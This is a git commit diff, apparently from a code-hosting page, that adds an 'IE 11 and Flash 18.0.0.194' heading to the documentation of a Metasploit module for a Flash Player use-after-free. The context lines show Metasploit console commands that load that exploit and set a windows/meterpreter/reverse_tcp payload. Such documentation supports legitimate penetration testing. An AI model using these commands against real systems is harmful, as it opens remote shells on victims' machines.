adding browser details
parent
4cba08a74d
commit
25f7835832
|
@ -18,6 +18,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability,
|
|||
|
||||
## Sample Output
|
||||
|
||||
### IE 11 and Flash 18.0.0.194
|
||||
|
||||
```
|
||||
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf
|
||||
msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
|
||||
|
|
Loading…
Reference in New Issue